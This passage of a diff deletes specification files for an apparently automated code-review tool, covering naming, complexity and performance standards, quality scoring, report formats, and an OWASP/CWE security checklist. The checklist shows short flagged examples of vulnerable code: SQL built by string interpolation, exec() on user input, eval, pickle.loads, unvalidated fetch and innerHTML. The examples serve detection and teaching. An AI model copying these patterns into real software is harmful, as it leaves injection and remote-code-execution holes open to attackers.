- Classes: PascalCase (`UserService`, `DatabaseConnection`)
|
||||
- Functions: snake_case (`get_user_by_id`, `validate_email`)
|
||||
- Constants: UPPER_SNAKE_CASE (`MAX_RETRY_COUNT`)
|
||||
- Private: prefix with `_` (`_internal_cache`)
|
||||
|
||||
**Java**:
|
||||
- Classes/Interfaces: PascalCase (`UserService`, `IUserRepository`)
|
||||
- Methods: camelCase (`getUserById`, `validateEmail`)
|
||||
- Constants: UPPER_SNAKE_CASE (`MAX_RETRY_COUNT`)
|
||||
- Packages: lowercase (`com.example.service`)
|
||||
|
||||
### Function Complexity
|
||||
|
||||
**Cyclomatic Complexity Thresholds**:
|
||||
- **Low**: 1-5 (simple functions, easy to test)
|
||||
- **Medium**: 6-10 (acceptable, well-structured)
|
||||
- **High**: 11-20 (needs refactoring)
|
||||
- **Very High**: 21+ (critical, must refactor)
|
||||
|
||||
**Calculation**:
|
||||
```
|
||||
Complexity = 1 (base)
|
||||
+ count(if)
|
||||
+ count(else if)
|
||||
+ count(while)
|
||||
+ count(for)
|
||||
+ count(case)
|
||||
+ count(catch)
|
||||
+ count(&&)
|
||||
+ count(||)
|
||||
+ count(? :)
|
||||
```
|
||||
|
||||
### Code Duplication
|
||||
|
||||
**Thresholds**:
|
||||
- **Acceptable**: < 3% duplication
|
||||
- **Warning**: 3-5% duplication
|
||||
- **Critical**: > 5% duplication
|
||||
|
||||
**Detection**:
|
||||
- Minimum block size: 5 lines
|
||||
- Similarity threshold: 85%
|
||||
- Ignore: Comments, imports, trivial getters/setters
|
||||
|
||||
### Dead Code Detection
|
||||
|
||||
**Targets**:
|
||||
- Unused imports
|
||||
- Unused variables/functions (not exported)
|
||||
- Unreachable code (after return/throw)
|
||||
- Commented-out code blocks (> 5 lines)
|
||||
|
||||
## Performance Standards
|
||||
|
||||
### N+1 Query Prevention
|
||||
|
||||
**Anti-patterns**:
|
||||
```javascript
|
||||
// ❌ N+1 Query
|
||||
for (const order of orders) {
|
||||
const user = await User.findById(order.userId);
|
||||
}
|
||||
|
||||
// ✅ Batch Query
|
||||
const userIds = orders.map(o => o.userId);
|
||||
const users = await User.findByIds(userIds);
|
||||
```
|
||||
|
||||
### Algorithm Efficiency
|
||||
|
||||
**Common Issues**:
|
||||
- Nested loops (O(n²)) when O(n) possible
|
||||
- Array.indexOf in loop → use Set.has()
|
||||
- Array.filter().length → use Array.some()
|
||||
- Multiple array iterations → combine into one pass
|
||||
|
||||
**Acceptable Complexity**:
|
||||
- **O(1)**: Ideal for lookups
|
||||
- **O(log n)**: Good for search
|
||||
- **O(n)**: Acceptable for linear scan
|
||||
- **O(n log n)**: Acceptable for sorting
|
||||
- **O(n²)**: Avoid if possible, document if necessary
|
||||
|
||||
### Memory Leak Prevention
|
||||
|
||||
**Common Issues**:
|
||||
- Event listeners without cleanup
|
||||
- setInterval without clearInterval
|
||||
- Global variable accumulation
|
||||
- Circular references
|
||||
- Large array/object allocations
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// ❌ Memory Leak
|
||||
element.addEventListener('click', handler);
|
||||
// No cleanup
|
||||
|
||||
// ✅ Proper Cleanup
|
||||
useEffect(() => {
|
||||
element.addEventListener('click', handler);
|
||||
return () => element.removeEventListener('click', handler);
|
||||
}, []);
|
||||
```
|
||||
|
||||
### Resource Cleanup
|
||||
|
||||
**Required Cleanup**:
|
||||
- Database connections
|
||||
- File handles
|
||||
- Network sockets
|
||||
- Timers (setTimeout, setInterval)
|
||||
- Event listeners
|
||||
|
||||
## Maintainability Standards
|
||||
|
||||
### Documentation Requirements
|
||||
|
||||
**Required for**:
|
||||
- All exported functions/classes
|
||||
- Public APIs
|
||||
- Complex algorithms
|
||||
- Non-obvious business logic
|
||||
|
||||
**JSDoc Format**:
|
||||
```javascript
|
||||
/**
|
||||
* Validates user credentials and generates JWT token
|
||||
*
|
||||
* @param {string} username - User's username or email
|
||||
* @param {string} password - Plain text password
|
||||
* @returns {Promise<{token: string, expiresAt: Date}>} JWT token and expiration
|
||||
* @throws {AuthenticationError} If credentials are invalid
|
||||
*
|
||||
* @example
|
||||
* const {token} = await authenticateUser('john@example.com', 'secret123');
|
||||
*/
|
||||
async function authenticateUser(username, password) {
|
||||
// ...
|
||||
}
|
||||
```
|
||||
|
||||
**Coverage Targets**:
|
||||
- Critical modules: 100%
|
||||
- High priority: 90%
|
||||
- Medium priority: 70%
|
||||
- Low priority: 50%
|
||||
|
||||
### Test Coverage Requirements
|
||||
|
||||
**Coverage Targets**:
|
||||
- Unit tests: 80% line coverage
|
||||
- Integration tests: Key workflows covered
|
||||
- E2E tests: Critical user paths covered
|
||||
|
||||
**Required Tests**:
|
||||
- All exported functions
|
||||
- All public methods
|
||||
- Error handling paths
|
||||
- Edge cases
|
||||
|
||||
**Test File Convention**:
|
||||
```
|
||||
src/auth/login.ts
|
||||
→ src/auth/login.test.ts (unit)
|
||||
→ src/auth/login.integration.test.ts (integration)
|
||||
```
|
||||
|
||||
### Dependency Management
|
||||
|
||||
**Best Practices**:
|
||||
- Pin major versions (`"^1.2.3"` not `"*"`)
|
||||
- Avoid 0.x versions in production
|
||||
- Regular security audits (npm audit, snyk)
|
||||
- Keep dependencies up-to-date
|
||||
- Minimize dependency count
|
||||
|
||||
**Version Pinning**:
|
||||
```json
|
||||
{
|
||||
"dependencies": {
|
||||
"express": "^4.18.0", // ✅ Pinned major version
|
||||
"lodash": "*", // ❌ Wildcard
|
||||
"legacy-lib": "^0.5.0" // ⚠️ Unstable 0.x
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Magic Numbers
|
||||
|
||||
**Definition**: Numeric literals without clear meaning
|
||||
|
||||
**Anti-patterns**:
|
||||
```javascript
|
||||
// ❌ Magic numbers
|
||||
if (user.age > 18) { }
|
||||
setTimeout(() => {}, 5000);
|
||||
buffer = new Array(1048576);
|
||||
|
||||
// ✅ Named constants
|
||||
const LEGAL_AGE = 18;
|
||||
const RETRY_DELAY_MS = 5000;
|
||||
const BUFFER_SIZE_1MB = 1024 * 1024;
|
||||
|
||||
if (user.age > LEGAL_AGE) { }
|
||||
setTimeout(() => {}, RETRY_DELAY_MS);
|
||||
buffer = new Array(BUFFER_SIZE_1MB);
|
||||
```
|
||||
|
||||
**Exceptions** (acceptable magic numbers):
|
||||
- 0, 1, -1 (common values)
|
||||
- 100, 1000 (obvious scaling factors in context)
|
||||
- HTTP status codes (200, 404, 500)
|
||||
|
||||
## Error Handling Standards
|
||||
|
||||
### Required Error Handling
|
||||
|
||||
**Categories**:
|
||||
- Network errors (timeout, connection failure)
|
||||
- Database errors (query failure, constraint violation)
|
||||
- Validation errors (invalid input)
|
||||
- Authentication/Authorization errors
|
||||
|
||||
**Anti-patterns**:
|
||||
```javascript
|
||||
// ❌ Silent failure
|
||||
try {
|
||||
await saveUser(user);
|
||||
} catch (err) {
|
||||
// Empty catch
|
||||
}
|
||||
|
||||
// ❌ Generic catch
|
||||
try {
|
||||
await processPayment(order);
|
||||
} catch (err) {
|
||||
console.log('Error'); // No details
|
||||
}
|
||||
|
||||
// ✅ Proper handling
|
||||
try {
|
||||
await processPayment(order);
|
||||
} catch (err) {
|
||||
logger.error('Payment processing failed', { orderId: order.id, error: err });
|
||||
throw new PaymentError('Failed to process payment', { cause: err });
|
||||
}
|
||||
```
|
||||
|
||||
### Logging Standards
|
||||
|
||||
**Required Logs**:
|
||||
- Authentication attempts (success/failure)
|
||||
- Authorization failures
|
||||
- Data modifications (create/update/delete)
|
||||
- External API calls
|
||||
- Errors and exceptions
|
||||
|
||||
**Log Levels**:
|
||||
- **ERROR**: System errors, exceptions
|
||||
- **WARN**: Recoverable issues, deprecations
|
||||
- **INFO**: Business events, state changes
|
||||
- **DEBUG**: Detailed troubleshooting info
|
||||
|
||||
**Sensitive Data**:
|
||||
- Never log: passwords, tokens, credit cards, SSNs
|
||||
- Hash/mask: emails, IPs, usernames (in production)
|
||||
|
||||
## Code Structure Standards
|
||||
|
||||
### File Organization
|
||||
|
||||
**Max File Size**: 300 lines (excluding tests)
|
||||
**Max Function Size**: 50 lines
|
||||
|
||||
**Module Structure**:
|
||||
```
|
||||
module/
|
||||
├── index.ts # Public exports
|
||||
├── types.ts # Type definitions
|
||||
├── constants.ts # Constants
|
||||
├── utils.ts # Utilities
|
||||
├── service.ts # Business logic
|
||||
└── service.test.ts # Tests
|
||||
```
|
||||
|
||||
### Import Organization
|
||||
|
||||
**Order**:
|
||||
1. External dependencies
|
||||
2. Internal modules (absolute imports)
|
||||
3. Relative imports
|
||||
4. Type imports (TypeScript)
|
||||
|
||||
```typescript
|
||||
// ✅ Organized imports
|
||||
import express from 'express';
|
||||
import { Logger } from 'winston';
|
||||
|
||||
import { UserService } from '@/services/user';
|
||||
import { config } from '@/config';
|
||||
|
||||
import { validateEmail } from './utils';
|
||||
import { UserRepository } from './repository';
|
||||
|
||||
import type { User, UserCreateInput } from './types';
|
||||
```
|
||||
|
||||
## Scoring System
|
||||
|
||||
### Overall Score Calculation
|
||||
|
||||
```
|
||||
Overall Score = (
|
||||
Security Score × 0.4 +
|
||||
Code Quality Score × 0.25 +
|
||||
Performance Score × 0.2 +
|
||||
Maintainability Score × 0.15
|
||||
)
|
||||
|
||||
Security = 100 - (Critical × 30 + High × 2 + Medium × 0.5)
|
||||
Code Quality = 100 - (violations / total_checks × 100)
|
||||
Performance = 100 - (issues / potential_issues × 100)
|
||||
Maintainability = (doc_coverage × 0.4 + test_coverage × 0.4 + dependency_health × 0.2)
|
||||
```
|
||||
|
||||
### Risk Levels
|
||||
|
||||
- **LOW**: Score 90-100
|
||||
- **MEDIUM**: Score 70-89
|
||||
- **HIGH**: Score 50-69
|
||||
- **CRITICAL**: Score < 50
|
||||
@@ -1,252 +0,0 @@
|
||||
# Quality Standards
|
||||
|
||||
## Overall Quality Metrics
|
||||
|
||||
### Quality Score Formula
|
||||
|
||||
```
|
||||
Overall Quality = (
|
||||
Correctness × 0.30 +
|
||||
Security × 0.25 +
|
||||
Maintainability × 0.20 +
|
||||
Performance × 0.15 +
|
||||
Documentation × 0.10
|
||||
)
|
||||
```
|
||||
|
||||
### Score Ranges
|
||||
|
||||
| Range | Grade | Description |
|
||||
|-------|-------|-------------|
|
||||
| 90-100 | A | Excellent - Production ready |
|
||||
| 80-89 | B | Good - Minor improvements needed |
|
||||
| 70-79 | C | Acceptable - Some issues to address |
|
||||
| 60-69 | D | Poor - Significant improvements required |
|
||||
| 0-59 | F | Failing - Major issues, not production ready |
|
||||
|
||||
## Review Completeness
|
||||
|
||||
### Mandatory Checks
|
||||
|
||||
**Security**:
|
||||
- ✅ OWASP Top 10 coverage
|
||||
- ✅ CWE Top 25 coverage
|
||||
- ✅ Language-specific security patterns
|
||||
- ✅ Dependency vulnerability scan
|
||||
|
||||
**Code Quality**:
|
||||
- ✅ Naming convention compliance
|
||||
- ✅ Complexity analysis
|
||||
- ✅ Code duplication detection
|
||||
- ✅ Dead code identification
|
||||
|
||||
**Performance**:
|
||||
- ✅ N+1 query detection
|
||||
- ✅ Algorithm efficiency check
|
||||
- ✅ Memory leak detection
|
||||
- ✅ Resource cleanup verification
|
||||
|
||||
**Maintainability**:
|
||||
- ✅ Documentation coverage
|
||||
- ✅ Test coverage analysis
|
||||
- ✅ Dependency health check
|
||||
- ✅ Error handling review
|
||||
|
||||
## Reporting Standards
|
||||
|
||||
### Finding Requirements
|
||||
|
||||
Each finding must include:
|
||||
- **Unique ID**: SEC-001, BP-001, etc.
|
||||
- **Type**: Specific issue type (sql-injection, high-complexity, etc.)
|
||||
- **Severity**: Critical, High, Medium, Low
|
||||
- **Location**: File path and line number
|
||||
- **Code Snippet**: Vulnerable/problematic code
|
||||
- **Message**: Clear description of the issue
|
||||
- **Recommendation**: Specific fix guidance
|
||||
- **Example**: Before/after code example
|
||||
|
||||
### Report Structure
|
||||
|
||||
**Executive Summary**:
|
||||
- High-level overview
|
||||
- Risk assessment
|
||||
- Key statistics
|
||||
- Compliance status
|
||||
|
||||
**Detailed Findings**:
|
||||
- Organized by severity
|
||||
- Grouped by category
|
||||
- Full details for each finding
|
||||
|
||||
**Action Plan**:
|
||||
- Prioritized fix list
|
||||
- Effort estimates
|
||||
- Timeline recommendations
|
||||
|
||||
**Metrics Dashboard**:
|
||||
- Quality scores
|
||||
- Trend analysis (if historical data)
|
||||
- Compliance status
|
||||
|
||||
**Appendix**:
|
||||
- Full findings list
|
||||
- Configuration details
|
||||
- Tool versions
|
||||
- References
|
||||
|
||||
## Output File Standards
|
||||
|
||||
### File Naming
|
||||
|
||||
```
|
||||
.code-review/
|
||||
├── inventory.json # File inventory
|
||||
├── security-findings.json # Security findings
|
||||
├── best-practices-findings.json # Best practices findings
|
||||
├── summary.json # Summary statistics
|
||||
├── REPORT.md # Main report
|
||||
├── FIX-CHECKLIST.md # Action checklist
|
||||
└── state.json # Session state
|
||||
```
|
||||
|
||||
### JSON Schema
|
||||
|
||||
**Finding Schema**:
|
||||
```json
|
||||
{
|
||||
"id": "string",
|
||||
"type": "string",
|
||||
"category": "security|code_quality|performance|maintainability",
|
||||
"severity": "critical|high|medium|low",
|
||||
"file": "string",
|
||||
"line": "number",
|
||||
"column": "number",
|
||||
"code": "string",
|
||||
"message": "string",
|
||||
"recommendation": {
|
||||
"description": "string",
|
||||
"fix_example": "string"
|
||||
},
|
||||
"references": ["string"],
|
||||
"cwe": "string (optional)",
|
||||
"owasp": "string (optional)"
|
||||
}
|
||||
```
|
||||
|
||||
## Validation Requirements
|
||||
|
||||
### Phase Completion Criteria
|
||||
|
||||
**Phase 1 (Code Discovery)**:
|
||||
- ✅ At least 1 file discovered
|
||||
- ✅ Files categorized by priority
|
||||
- ✅ Metadata extracted
|
||||
- ✅ Inventory JSON created
|
||||
|
||||
**Phase 2 (Security Analysis)**:
|
||||
- ✅ All critical/high priority files analyzed
|
||||
- ✅ Findings have severity classification
|
||||
- ✅ CWE/OWASP mappings included
|
||||
- ✅ Fix recommendations provided
|
||||
|
||||
**Phase 3 (Best Practices)**:
|
||||
- ✅ Code quality checks completed
|
||||
- ✅ Performance analysis done
|
||||
- ✅ Maintainability assessed
|
||||
- ✅ Recommendations provided
|
||||
|
||||
**Phase 4 (Report Generation)**:
|
||||
- ✅ All findings consolidated
|
||||
- ✅ Scores calculated
|
||||
- ✅ Reports generated
|
||||
- ✅ Checklist created
|
||||
|
||||
## Skill Execution Standards
|
||||
|
||||
### Performance Targets
|
||||
|
||||
- **Phase 1**: < 30 seconds per 1000 files
|
||||
- **Phase 2**: < 60 seconds per 100 files (security)
|
||||
- **Phase 3**: < 60 seconds per 100 files (best practices)
|
||||
- **Phase 4**: < 10 seconds (report generation)
|
||||
|
||||
### Resource Limits
|
||||
|
||||
- **Memory**: < 2GB for projects with 1000+ files
|
||||
- **CPU**: Efficient pattern matching (minimize regex complexity)
|
||||
- **Disk**: Use streaming for large files (> 10MB)
|
||||
|
||||
### Error Handling
|
||||
|
||||
**Graceful Degradation**:
|
||||
- If tool unavailable: Skip check, note in report
|
||||
- If file unreadable: Log warning, continue with others
|
||||
- If analysis fails: Report error, continue with next file
|
||||
|
||||
**User Notification**:
|
||||
- Progress updates every 10% completion
|
||||
- Clear error messages with troubleshooting steps
|
||||
- Final summary with metrics and file locations
|
||||
|
||||
## Integration Standards
|
||||
|
||||
### Git Integration
|
||||
|
||||
**Pre-commit Hook**:
|
||||
```bash
|
||||
#!/bin/bash
|
||||
ccw run code-reviewer --scope staged --severity critical,high
|
||||
exit $? # Block commit if critical/high issues found
|
||||
```
|
||||
|
||||
**PR Comments**:
|
||||
- Automatic review comments on changed lines
|
||||
- Summary comment with overall findings
|
||||
- Status check (pass/fail based on threshold)
|
||||
|
||||
### CI/CD Integration
|
||||
|
||||
**Requirements**:
|
||||
- Exit code 0 if no critical/high issues
|
||||
- Exit code 1 if blocking issues found
|
||||
- JSON output for parsing
|
||||
- Configurable severity threshold
|
||||
|
||||
### IDE Integration
|
||||
|
||||
**LSP Support** (future):
|
||||
- Real-time security/quality feedback
|
||||
- Inline fix suggestions
|
||||
- Quick actions for common fixes
|
||||
|
||||
## Compliance Mapping
|
||||
|
||||
### Supported Standards
|
||||
|
||||
**PCI DSS**:
|
||||
- Requirement 6.5: Common coding vulnerabilities
|
||||
- Map findings to specific requirements
|
||||
|
||||
**HIPAA**:
|
||||
- Technical safeguards
|
||||
- Map data exposure findings
|
||||
|
||||
**GDPR**:
|
||||
- Data protection by design
|
||||
- Map sensitive data handling
|
||||
|
||||
**SOC 2**:
|
||||
- Security controls
|
||||
- Map access control findings
|
||||
|
||||
### Compliance Reports
|
||||
|
||||
Generate compliance-specific reports:
|
||||
```
|
||||
.code-review/compliance/
|
||||
├── pci-dss-report.md
|
||||
├── hipaa-report.md
|
||||
├── gdpr-report.md
|
||||
└── soc2-report.md
|
||||
```
|
||||
@@ -1,243 +0,0 @@
|
||||
# Security Requirements Specification
|
||||
|
||||
## OWASP Top 10 Coverage
|
||||
|
||||
### A01:2021 - Broken Access Control
|
||||
|
||||
**Checks**:
|
||||
- Missing authorization checks on protected routes
|
||||
- Insecure direct object references (IDOR)
|
||||
- Path traversal vulnerabilities
|
||||
- Missing CSRF protection
|
||||
- Elevation of privilege
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// Missing auth middleware
|
||||
router.get('/admin/*', handler); // ❌ No auth check
|
||||
|
||||
// Insecure direct object reference
|
||||
router.get('/user/:id', async (req, res) => {
|
||||
const user = await User.findById(req.params.id); // ❌ No ownership check
|
||||
res.json(user);
|
||||
});
|
||||
```
|
||||
|
||||
### A02:2021 - Cryptographic Failures
|
||||
|
||||
**Checks**:
|
||||
- Sensitive data transmitted without encryption
|
||||
- Weak cryptographic algorithms (MD5, SHA1)
|
||||
- Hardcoded secrets/keys
|
||||
- Insecure random number generation
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// Weak hashing
|
||||
const hash = crypto.createHash('md5').update(password); // ❌ MD5 is weak
|
||||
|
||||
// Hardcoded secret
|
||||
const token = jwt.sign(payload, 'secret123'); // ❌ Hardcoded secret
|
||||
```
|
||||
|
||||
### A03:2021 - Injection
|
||||
|
||||
**Checks**:
|
||||
- SQL injection
|
||||
- NoSQL injection
|
||||
- Command injection
|
||||
- LDAP injection
|
||||
- XPath injection
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// SQL injection
|
||||
const query = `SELECT * FROM users WHERE id = ${userId}`; // ❌
|
||||
|
||||
// Command injection
|
||||
exec(`git clone ${userRepo}`); // ❌
|
||||
```
|
||||
|
||||
### A04:2021 - Insecure Design
|
||||
|
||||
**Checks**:
|
||||
- Missing rate limiting
|
||||
- Lack of input validation
|
||||
- Business logic flaws
|
||||
- Missing security requirements
|
||||
|
||||
### A05:2021 - Security Misconfiguration
|
||||
|
||||
**Checks**:
|
||||
- Default credentials
|
||||
- Overly permissive CORS
|
||||
- Verbose error messages
|
||||
- Unnecessary features enabled
|
||||
- Missing security headers
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// Overly permissive CORS
|
||||
app.use(cors({ origin: '*' })); // ❌
|
||||
|
||||
// Verbose error
|
||||
res.status(500).json({ error: err.stack }); // ❌
|
||||
```
|
||||
|
||||
### A06:2021 - Vulnerable and Outdated Components
|
||||
|
||||
**Checks**:
|
||||
- Dependencies with known vulnerabilities
|
||||
- Unmaintained dependencies
|
||||
- Using deprecated APIs
|
||||
|
||||
### A07:2021 - Identification and Authentication Failures
|
||||
|
||||
**Checks**:
|
||||
- Weak password requirements
|
||||
- Permits brute force attacks
|
||||
- Exposed session IDs
|
||||
- Weak JWT implementation
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// Weak bcrypt rounds
|
||||
bcrypt.hash(password, 4); // ❌ Too low (min: 10)
|
||||
|
||||
// Session ID in URL
|
||||
res.redirect(`/dashboard?sessionId=${sessionId}`); // ❌
|
||||
```
|
||||
|
||||
### A08:2021 - Software and Data Integrity Failures
|
||||
|
||||
**Checks**:
|
||||
- Insecure deserialization
|
||||
- Unsigned/unverified updates
|
||||
- CI/CD pipeline vulnerabilities
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// Insecure deserialization
|
||||
const obj = eval(userInput); // ❌
|
||||
|
||||
// Pickle vulnerability (Python)
|
||||
data = pickle.loads(untrusted_data) # ❌
|
||||
```
|
||||
|
||||
### A09:2021 - Security Logging and Monitoring Failures
|
||||
|
||||
**Checks**:
|
||||
- Missing audit logs
|
||||
- Sensitive data in logs
|
||||
- Insufficient monitoring
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// Password in logs
|
||||
console.log(`Login attempt: ${username}:${password}`); // ❌
|
||||
```
|
||||
|
||||
### A10:2021 - Server-Side Request Forgery (SSRF)
|
||||
|
||||
**Checks**:
|
||||
- Unvalidated URLs in requests
|
||||
- Internal network access
|
||||
- Cloud metadata exposure
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// SSRF vulnerability
|
||||
const response = await fetch(userProvidedUrl); // ❌
|
||||
```
|
||||
|
||||
## CWE Top 25 Coverage
|
||||
|
||||
### CWE-79: Cross-site Scripting (XSS)
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
element.innerHTML = userInput; // ❌
|
||||
document.write(userInput); // ❌
|
||||
```
|
||||
|
||||
### CWE-89: SQL Injection
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
query = `SELECT * FROM users WHERE name = '${name}'`; // ❌
|
||||
```
|
||||
|
||||
### CWE-20: Improper Input Validation
|
||||
|
||||
**Checks**:
|
||||
- Missing input sanitization
|
||||
- No input length limits
|
||||
- Unvalidated file uploads
|
||||
|
||||
### CWE-78: OS Command Injection
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
exec(`ping ${userInput}`); // ❌
|
||||
```
|
||||
|
||||
### CWE-190: Integer Overflow
|
||||
|
||||
**Checks**:
|
||||
- Large number operations without bounds checking
|
||||
- Array allocation with user-controlled size
|
||||
|
||||
## Language-Specific Security Rules
|
||||
|
||||
### TypeScript/JavaScript
|
||||
|
||||
- Prototype pollution
|
||||
- eval() usage
|
||||
- Unsafe regex (ReDoS)
|
||||
- require() with dynamic input
|
||||
|
||||
### Python
|
||||
|
||||
- pickle vulnerabilities
|
||||
- yaml.unsafe_load()
|
||||
- SQL injection in SQLAlchemy
|
||||
- Command injection in subprocess
|
||||
|
||||
### Java
|
||||
|
||||
- Deserialization vulnerabilities
|
||||
- XXE in XML parsers
|
||||
- Path traversal
|
||||
- SQL injection in JDBC
|
||||
|
||||
### Go
|
||||
|
||||
- Race conditions
|
||||
- SQL injection
|
||||
- Path traversal
|
||||
- Weak cryptography
|
||||
|
||||
## Severity Classification
|
||||
|
||||
### Critical
|
||||
- Remote code execution
|
||||
- SQL injection with write access
|
||||
- Authentication bypass
|
||||
- Hardcoded credentials in production
|
||||
|
||||
### High
|
||||
- XSS in sensitive contexts
|
||||
- Missing authorization checks
|
||||
- Sensitive data exposure
|
||||
- Insecure cryptography
|
||||
|
||||
### Medium
|
||||
- Missing rate limiting
|
||||
- Weak password policy
|
||||
- Security misconfiguration
|
||||
- Information disclosure
|
||||
|
||||
### Low
|
||||
- Missing security headers
|
||||
- Verbose error messages
|
||||
- Outdated dependencies (no known exploits)
|
||||
@@ -1,234 +0,0 @@
|
||||
# Best Practice Finding Template
|
||||
|
||||
Use this template for documenting code quality, performance, and maintainability issues.
|
||||
|
||||
## Finding Structure
|
||||
|
||||
```json
|
||||
{
|
||||
"id": "BP-{number}",
|
||||
"type": "{issue-type}",
|
||||
"category": "{code_quality|performance|maintainability}",
|
||||
"severity": "{high|medium|low}",
|
||||
"file": "{file-path}",
|
||||
"line": {line-number},
|
||||
"function": "{function-name}",
|
||||
"message": "{clear-description}",
|
||||
"recommendation": {
|
||||
"description": "{how-to-fix}",
|
||||
"example": "{corrected-code}"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Markdown Template
|
||||
|
||||
```markdown
|
||||
### 🟠 [BP-{number}] {Issue Title}
|
||||
|
||||
**File**: `{file-path}:{line}`
|
||||
**Category**: {Code Quality|Performance|Maintainability}
|
||||
|
||||
**Issue**: {Detailed explanation of the problem}
|
||||
|
||||
**Current Code**:
|
||||
\`\`\`{language}
|
||||
{problematic-code}
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`{language}
|
||||
{improved-code-with-comments}
|
||||
\`\`\`
|
||||
|
||||
**Impact**: {Why this matters - readability, performance, maintainability}
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Example: High Complexity
|
||||
|
||||
```markdown
|
||||
### 🟠 [BP-001] High Cyclomatic Complexity
|
||||
|
||||
**File**: `src/utils/validator.ts:78`
|
||||
**Category**: Code Quality
|
||||
**Function**: `validateUserInput`
|
||||
**Complexity**: 15 (threshold: 10)
|
||||
|
||||
**Issue**: Function has 15 decision points, making it difficult to test and maintain.
|
||||
|
||||
**Current Code**:
|
||||
\`\`\`typescript
|
||||
function validateUserInput(input) {
|
||||
if (!input) return false;
|
||||
if (!input.email) return false;
|
||||
if (!input.email.includes('@')) return false;
|
||||
if (input.email.length > 255) return false;
|
||||
// ... 11 more conditions
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`typescript
|
||||
// Extract validation rules
|
||||
const validationRules = {
|
||||
email: (email) => email && email.includes('@') && email.length <= 255,
|
||||
password: (pwd) => pwd && pwd.length >= 8 && /[A-Z]/.test(pwd),
|
||||
username: (name) => name && /^[a-zA-Z0-9_]+$/.test(name),
|
||||
};
|
||||
|
||||
// Simplified validator
|
||||
function validateUserInput(input) {
|
||||
return Object.entries(validationRules).every(([field, validate]) =>
|
||||
validate(input[field])
|
||||
);
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Impact**: Reduces complexity from 15 to 3, improves testability, and makes validation rules reusable.
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Example: N+1 Query
|
||||
|
||||
```markdown
|
||||
### 🟠 [BP-002] N+1 Query Pattern
|
||||
|
||||
**File**: `src/api/orders.ts:45`
|
||||
**Category**: Performance
|
||||
|
||||
**Issue**: Database query executed inside loop, causing N+1 queries problem. For 100 orders, this creates 101 database queries instead of 2.
|
||||
|
||||
**Current Code**:
|
||||
\`\`\`typescript
|
||||
const orders = await Order.findAll();
|
||||
for (const order of orders) {
|
||||
const user = await User.findById(order.userId);
|
||||
order.userName = user.name;
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`typescript
|
||||
// Batch query all users at once
|
||||
const orders = await Order.findAll();
|
||||
const userIds = orders.map(o => o.userId);
|
||||
const users = await User.findByIds(userIds);
|
||||
|
||||
// Create lookup map for O(1) access
|
||||
const userMap = new Map(users.map(u => [u.id, u]));
|
||||
|
||||
// Enrich orders with user data
|
||||
for (const order of orders) {
|
||||
order.userName = userMap.get(order.userId)?.name;
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Impact**: Reduces database queries from O(n) to O(1), significantly improving performance for large datasets.
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Example: Missing Documentation
|
||||
|
||||
```markdown
|
||||
### 🟡 [BP-003] Missing Documentation
|
||||
|
||||
**File**: `src/services/PaymentService.ts:23`
|
||||
**Category**: Maintainability
|
||||
|
||||
**Issue**: Exported class lacks documentation, making it difficult for other developers to understand its purpose and usage.
|
||||
|
||||
**Current Code**:
|
||||
\`\`\`typescript
|
||||
export class PaymentService {
|
||||
async processPayment(orderId: string, amount: number) {
|
||||
// implementation
|
||||
}
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`typescript
|
||||
/**
|
||||
* Service for processing payment transactions
|
||||
*
|
||||
* Handles payment processing, refunds, and transaction logging.
|
||||
* Integrates with Stripe payment gateway.
|
||||
*
|
||||
* @example
|
||||
* const paymentService = new PaymentService();
|
||||
* const result = await paymentService.processPayment('order-123', 99.99);
|
||||
*/
|
||||
export class PaymentService {
|
||||
/**
|
||||
* Process a payment for an order
|
||||
*
|
||||
* @param orderId - Unique order identifier
|
||||
* @param amount - Payment amount in USD
|
||||
* @returns Payment confirmation with transaction ID
|
||||
* @throws {PaymentError} If payment processing fails
|
||||
*/
|
||||
async processPayment(orderId: string, amount: number) {
|
||||
// implementation
|
||||
}
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Impact**: Improves code discoverability and reduces onboarding time for new developers.
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Example: Memory Leak
|
||||
|
||||
```markdown
|
||||
### 🟠 [BP-004] Potential Memory Leak
|
||||
|
||||
**File**: `src/components/Chat.tsx:56`
|
||||
**Category**: Performance
|
||||
|
||||
**Issue**: WebSocket event listener added without cleanup, causing memory leaks when component unmounts.
|
||||
|
||||
**Current Code**:
|
||||
\`\`\`tsx
|
||||
useEffect(() => {
|
||||
socket.on('message', handleMessage);
|
||||
}, []);
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`tsx
|
||||
useEffect(() => {
|
||||
socket.on('message', handleMessage);
|
||||
|
||||
// Cleanup on unmount
|
||||
return () => {
|
||||
socket.off('message', handleMessage);
|
||||
};
|
||||
}, []);
|
||||
\`\`\`
|
||||
|
||||
**Impact**: Prevents memory leaks and improves application stability in long-running sessions.
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Severity Guidelines
|
||||
|
||||
### High
|
||||
- Major performance impact (N+1 queries, O(n²) algorithms)
|
||||
- Critical maintainability issues (complexity > 15)
|
||||
- Missing error handling in critical paths
|
||||
|
||||
### Medium
|
